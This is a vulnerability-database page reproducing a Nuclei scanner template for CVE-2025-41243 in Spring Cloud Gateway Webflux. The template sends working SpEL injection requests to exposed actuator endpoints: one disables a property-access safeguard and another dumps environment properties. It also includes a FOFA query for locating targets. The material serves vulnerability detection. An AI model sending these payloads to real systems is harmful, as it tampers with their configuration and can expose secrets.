Lucene search
K

Spring Cloud Gateway Server Webflux - Broken Access Control

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Broken access in Spring Cloud Gateway Webflux exposes actuator endpoints to modify system settings.

Related
Refs
Code
id: CVE-2025-41243

info:
  name: Spring Cloud Gateway Server Webflux - Broken Access Control
  author: Redmomn
  severity: critical
  description: |
    Spring Cloud Gateway Server Webflux contains a vulnerability caused by unsecured and exposed actuator endpoints allowing modification of Spring Environment properties, letting attackers modify configuration, exploit requires unsecured actuator endpoints exposure.
  impact: |
    Attackers can modify Spring Environment properties, potentially leading to configuration tampering and further compromise.
  remediation: |
    Secure actuator endpoints or disable gateway actuator exposure; update to latest Spring Cloud Gateway Server Webflux version.
  reference:
    - https://blog.z3r.ru/posts/spring-cloud-gateway-spel-vuln/
    - https://xz.aliyun.com/news/19006
    - https://spring.io/security/cve-2025-41243
    - https://nvd.nist.gov/vuln/detail/CVE-2025-41243
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-41243
    epss-score: 0.03311
    epss-percentile: 0.87078
    cwe-id: CWE-94
  metadata:
    verified: true
    fofa-query: '((header="Server: Netty@SpringBoot" || (body="Whitelabel Error Page" && body="There was an unexpected error")) && body!="couchdb") || title="SpringBootAdmin-Server" || body="SpringBoot"'
  tags: cve,cve2025,spring-boot,injection

variables:
  route: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        POST /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "id": "{{route}}",
          "filters": [
            {
              "name": "AddResponseHeader",
              "args": {
                "value": "#{ @systemProperties['spring. cloud.gateway.restrictive-property-accessor.enabled'] = false}",
                "name": "cmd"
              }
            }
          ],
          "uri": "http://{{interactsh-url}}",
          "order": 0
        }

      - |
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 201 && status_code_2 == 200 && status_code_3 == 200'
          - 'len(body_1) == 0 && len(body_2) == 0'
          - 'contains_all(body_3, "AddResponseHeader", "route_id")'
        condition: and
        internal: true

  - raw:
      - |
        POST /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "id": "{{route}}",
          "filters": [
            {
              "name": "AddResponseHeader",
              "args": {
                "value": "#{ @environment.getPropertySources.?[#this.name matches '.*optional:classpath:.*' ][0].source.![{#this.getKey+'='+#this.getValue.toString}] }",
                "name": "cmd"
              }
            }
          ],
          "uri": "http://{{interactsh-url}}",
          "order": 0
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'len(body) == 0'
        condition: and
        internal: true

  - raw:
      - |
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'len(body) == 0'
        condition: and
        internal: true

  - raw:
      - |
        GET /actuator/gateway/routes/{{route}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "spring.cloud.gateway","RouteDefinitionRouteLocator")'
        condition: and
# digest: 4a0a004730450220053f9d73f53604a5a5a58bbef93559f4b0aaa1012a1a9b09306341f2cabf0de702210095a34240e7804702c1b88dc2d2c59252118c4c0549eb6d65ae379c91c6fd67d8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.110
EPSS0.03311
SSVC
15